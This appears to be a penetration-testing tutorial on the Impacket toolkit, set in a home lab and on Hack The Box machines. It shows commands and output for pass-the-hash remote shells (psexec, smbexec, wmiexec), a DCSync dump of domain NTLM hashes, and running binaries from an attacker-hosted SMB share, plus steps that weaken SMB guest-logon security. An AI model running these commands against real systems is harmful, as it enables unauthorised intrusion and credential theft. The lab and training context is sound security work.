Impacket

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC). According to the Core Security Website, Impacket supports protocols like IP, TCP, UDP, ICMP, IGMP, ARP, IPv4, IPv6, SMB, MSRPC, NTLM, Kerberos, WMI, LDAP etc.

For the following practical we will require two systems,

A Windows Server with Domain Controller Configured
A Kali Linux

Here, in our lab scenario we have configured the following settings on our systems.

Windows Server Details

Domain: SERVER
User: Administrator
Password: T00r
IP Address: 192.168.1.140

Kali Linux: 192.168.1.135

Before beginning with the Impacket tools, let’s do a Nmap version scan on the target windows server to get the information about the services running on the Windows Server.

nmap –sV 192.168.1.140

As you can see in the above screenshot, we have domain services, Kerberos Services, Netbios Services, LDAP services and Windows RPC services.

Now let’s install the Impacket tools from GitHub. You can get it from here.

Firstly, clone the git, and then install the Impacket as shown in the screenshot.

git clone https://github.com/CoreSecurity/impacket.git

cd impacket/

python setup.py install

This will install Impacket on your Kali Linux, now after installation let’s look at what different tools does Impacket have in its box.

cd impacket/examples

These are the some of the tools included in impacket, let’s try some of them.

Ping.py

Simple ICMP ping that uses the ICMP echo and echo-reply packets to check the status of a host. If the remote host is up, it should reply to the echo probe with an echo-reply packet.

./ping.py

Syntax: ./ping.py [Source IP] [Destination IP]

./ping.py 192.168.1.135 192.168.1.140

Here we can see that we are getting the ICMP reply from 192.168.1.140 (Windows Server)

Lookupsid.py

A Windows SID bruteforcer example through [MS-LSAT] MSRPC Interface, aiming at finding remote users/groups.

./lookupsid.py

Syntax: ./lookupsid.py [[domain/] username [: password] @] [Target IP Address]

./lookupsid.py SERVER/Administrator:T00r@192.168.1.140

As you can see that the lookupsid tool had extracted the user and group information from the server

Psexec.py

It lets you execute processes on remote windows systems, copy files on remote systems, process their output and stream it back. It allows execution of remote shell commands directly with full interactive console without having to install any client software.

./psexec.py

root@kali:~/htb/silo# python psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 administrator@10.10.10.82
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

[*] Requesting shares on 10.10.10.82.....
[*] Found writable share ADMIN$
[*] Uploading file JbNIPTbN.exe
[*] Opening SVCManager on 10.10.10.82.....
[*] Creating service cKNz on 10.10.10.82.....
[*] Starting service cKNz.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

Syntax: ./psexec.py [[domain/] username [: password] @] [Target IP Address]

/psexec.py SERVER/Administrator:T00r@192.168.1.140

As you can see that we got a remote shell of the server in the given screenshot (note if last character of password = ! you get an error : bash: !@192.168.178.200: event not found )

Rpcdump.py

This script will dump the list of RPC endpoints and string bindings registered at the target. It will also try to match them with a list of well-known endpoints.

./rpcdump.py

Syntax: ./rpcdump.py [[domain/] username [: password] @] [Target IP Address]

./rpcdump.py SERVER/Administrator:T00r@192.168.1.140

As you can see below we have the list of RPC targets

Samrdump.py

An application that communicates with the Security Account Manager Remote interface from the MSRPC suite. It lists system user accounts, available resource shares and other sensitive information exported through this service.

./samrdump.py

Syntax: ./samrdump.py [[domain/] username [: password] @] [Target IP Address]

./samrdump.py SERVER/Administrator:T00r@192.168.1.140

As you can see below we have extracted SAM information form the Target Server

Secretsdump.py

root@kali:~/htb/hercules# python secretsdump.py -just-dc-ntlm HTB.LOCAL/puckie@192.168.178.24
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
puckie:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
[*] Cleaning up...

SMBexec.py

It generates a semi-interactive shell, . It does not require to install any service/agent at the target server. It’s stealth and runs as Administrator.

./smbexec.py

E:\OSCP>smbexec -hashes 566EFC084E3FCCB7B4DF6D823C906E54:566EFC084E3FCCB7B4DF6D823C906E54 administrator@192.168.178.24
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

SMBserver.py

root@kali:~/htb/dropzone/share# impacket-smbserver share ./
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed

c:\windows\system32>\\10.10.14.19\share\whoami.exe
\\10.10.14.19\share\whoami.exe
NT AUTHORITY\SYSTEM
c:\windows\system32>copy \\10.10.14.19\share\whoami.exe
copy \\10.10.14.19\share\whoami.exe
1 file(s) copied.


KALI htb/tally# impacket-smbserver share ./ -smb2support
LT-JACCO GroupPolicy Editor : Enable insecure guest logons
Within the latest “Windows 10 Fall Creators Update” the Guest access in SMB2 is disabled by default.

You can change this setting within your group policy settings.
Within the run box, type “gpedit.msc”
Within the local Group Policy Editor, select “Administrative Templates”
Resolution
If you want to enable insecure guest access, you can configure the following Group Policy settings:
Computer configuration\administrative templates\network\Lanman Workstation
"Enable insecure guest logons"
Select OK

Sniff.py

Simple packet sniffer that uses the pcapy library to listen for packets in transit over the specified interface.

. /sniff.py

Choose the interface using the number associated with it. And the sniffing starts.

Sniffer.py

Simple packet sniffer that uses a raw socket to listen for packets in transit corresponding to the specified protocols.

. /sniffer.py

And the sniffer starts to monitor icmp, tcp and udp

Wmiexec.py

It generates a semi-interactive shell, used through Windows Management Instrumentation. It does not require to install any service/agent at the target server. It runs as Administrator. It is highly stealthy.

./wmiexec.py

root@kali:~/htb/silo# python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 administrator@10.10.10.82
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
silo\administrator

Syntax: ./wmiexec.py [[domain/] username [: password] @] [Target IP Address]

./wmiexec.py SERVER/Administrator:T00r@192.168.1.140

As you can se below that we have the shell from the Target Server

Wmiquery.py

It allows to issue WQL queries and get description of WMI objects at the target system.

./wmiquery.py

Syntax: ./wmiquery.py [[domain/] username [: password] @] [Target IP Address]

./wmiquery.py SERVER/Administrator:T00r@192.168.1.140

This will open a shell, where you can run WQL queries like

SELECT * FROM Win32_LogicalDisk WHERE FreeSpace < 209152

Atexec.py

This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.

./atexec.py

Syntax: /atexec.py [[domain/] username [: password] @] [Target IP Address] [Command]

./atexec.py SERVER/Administrator:T00r@192.168.1.140 systeminfo

As you can see below that a remote connection was established to the server and the command systeminfo was run on the Target server with the output of the command delivered on the Kali terminal.

getArch.py

This script will connect against a target (or list of targets) machine/s and gather the OS architecture type installed by (ab) using a documented MSRPC feature.

./getArch.py

Syntax: ./getArch.py -target [IP Address]

Command: ./getArch.py -target 192.168.1.140

Here we can see that the architecture of the target system is 64-bit

Ifmap

This script will bind to the target’s MGMT interface to get a list of interface IDs. It will use that list on top of another list of interfaces UUID and reports whether the interface is listed and/or listening.

Syntax: ./ifmap.py [Host IP Address] [Port]

./ifmap.py 192.168.1.140 135

./ifmap.py 192.168.1.140 49154

mssqlclient.py

This script will connect against a target (or list of targets) machine/s

root@kali:~/htb/# python mssqlclient.py 
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

usage: mssqlclient.py [-h] [-port PORT] [-db DB] [-windows-auth] [-debug]
[-file FILE] [-hashes LMHASH:NTHASH] [-no-pass] [-k]
[-aesKey hex key] [-dc-ip ip address]
target

TDS client implementation (SSL supported).

positional arguments:
target [[domain/]username[:password]@]<targetName or address>

optional arguments:
-h, --help show this help message and exit
-port PORT target MSSQL port (default 1433)
-db DB MSSQL database instance (default None)
-windows-auth whether or not to use Windows Authentication (default
False)
-debug Turn DEBUG output ON
-file FILE input file with commands to execute in the SQL shell

authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from
ccache file (KRB5CCNAME) based on target parameters.
If valid credentials cannot be found, it will use the
ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256
bits)
-dc-ip ip address IP Address of the domain controller. If ommited it use
the domain part (FQDN) specified in the target
parameter

Example: .mssqlclient.py -windows-auth htb.local/mssql-svc@10.10.x.x

Author: Jacco Straathof